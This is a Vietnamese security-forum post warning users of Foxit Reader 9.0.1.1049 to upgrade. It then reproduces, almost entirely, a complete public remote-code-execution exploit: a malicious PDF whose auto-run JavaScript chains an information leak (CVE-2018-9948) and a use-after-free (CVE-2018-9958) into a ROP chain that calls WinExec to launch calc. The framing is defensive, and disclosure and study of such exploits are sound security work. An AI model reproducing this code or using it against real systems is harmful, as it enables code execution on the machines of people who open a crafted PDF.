Lỗ hỗng trên foxit reader 9.0.1.1049

Thảo luận trong 'Exploitation' bắt đầu bởi khanhhoangbkdn, 26/06/18, 08:06 AM.

 1. khanhhoangbkdn

  khanhhoangbkdn Moderator Thành viên BQT

  Tham gia: 07/10/16, 10:10 AM
  Bài viết: 67
  Đã được thích: 34
  Điểm thành tích:
  18
  Hiện tại thì đã có mã POC cho foxit reader v9.0.1.1049 mình chắc là rất nhiều người đang dùng phiên bản này, các bạn nên upload lên phiên bản khác để tránh bị khai thác trong thời gian sắp tới nhé.
  Mã khai khác
  Mã:
  %PDF
  1 0 obj
  <</Pages 1 0 R /OpenAction 2 0 R>>
  2 0 obj
  <</S /JavaScript /JS (
  
  /*
  Foxit Reader Remote Code Execution Exploit
  ==========================================
  
  Written by: Steven Seeley (mr_me) of Source Incite
  Date: 22/06/2018
  Technical details: https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html
  Download: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
  Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
  Tested on:
    1. Windows 7 Ultimate x86 build 6.1.7601 sp1
    2. Windows 10 Pro x86 v1803 build 10.0.17134
  Vulnerabilities leveraged:
    1. CVE-2018-9948
    2. CVE-2018-9958
  */
  
  var heap_ptr  = 0;
  var foxit_base = 0;
  var pwn_array = [];
  
  function prepare_heap(size){
    /*
      This function prepares the heap state between allocations
      and frees to get a predictable memory address back.
    */
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
      arr[i] = this.addAnnot({type: "Text"});;
      if (typeof arr[i] == "object"){
        arr[i].destroy();
      }
    }
  }
    
  function gc() {
    /*
      This is a simple garbage collector, written by the notorious @saelo
      Greetz, mi amigo.
    */
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
      var x = new ArrayBuffer(maxMallocBytes);
    }
  }
  
  function alloc_at_leak(){
    /*
      This is the function that allocates at the leaked address
    */
    for (var i = 0; i < 0x64; i++){
      pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
  }
  
  function control_memory(){
    /*
      This is the function that fills the memory address that we leaked
    */
    for (var i = 0; i < 0x64; i++){
      for (var j = 0; j < pwn_array[i].length; j++){
        pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
      }
    }
  }
  
  function leak_vtable(){
    /*
      Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
      ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
      Found by: bit from meepwn team
    */
  
    // alloc
    var a = this.addAnnot({type: "Text"});
  
    // free
    a.destroy();
    gc();
    
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);
  
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
  
    // leak the vtable
    var leaked = stolen[0] & 0xffff0000;
  
    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    foxit_base = leaked - 0x01f50000;
  }
  
  function leak_heap_chunk(){
    /*
      Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
      ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
      Found by: bit from meepwn team
    */
  
    // alloc
    var a = this.addAnnot({type: "Text"});
    
    // free
    a.destroy();
    
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);
      
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    
    // alloc at the freed location
    alloc_at_leak();
    
    // leak a heap chunk of size 0x40
    heap_ptr = stolen[1];
  }
  
  function reclaim(){
    /*
      This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
      All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    */
  
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
      arr[i] = new ArrayBuffer(0x60);
      var rop = new Int32Array(arr[i]);
  
      rop[0x00] = heap_ptr;        // pointer to our stack pivot from the TypedArray leak
      rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
      rop[0x02] = 0x72727272;       // junk
      rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
      rop[0x04] = 0xffffffff;       // ret of WinExec
      rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
      rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
      rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
      rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
      rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
      rop[0x0a] = foxit_base + 0x0041c6ca; // ret
      rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
      rop[0x0c] = 0x636c6163;       // calc
      rop[0x0d] = 0x00000000;       // adios, amigo
  
      for (var j = 0x0e; j < rop.length; j++) {
        rop[j] = 0x71727374;
      }
    }
  }
  
  function trigger_uaf(){
    /*
      Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
      ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
      Found by: Steven Seeley (mr_me) of Source Incite
    */
  
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
      "0":{
        get: function () {
  
          // free
          that.getAnnot(0, "uaf").destroy();
  
          // reclaim freed memory
          reclaim();
          return 1;
        }
      }
    });
  
    // re-use
    a.point = arr;
  }
  
  function main(){
  
    // 1. Leak a heap chunk of size 0x40
    leak_heap_chunk();
  
    // 2. Leak vtable and calculate the base of Foxit Reader
    leak_vtable();
  
    // 3. Then fill the memory region from step 1 with a stack pivot
    control_memory();
  
    // 4. Trigger the uaf, reclaim the memory, pivot to rop and win
    trigger_uaf();
  }
  
  if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
      if (app.appFoxitVersion == "9.0.1.1049"){
        main();
      }
    }
  }
  
  )>> trailer <</Root 1 0 R>>
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan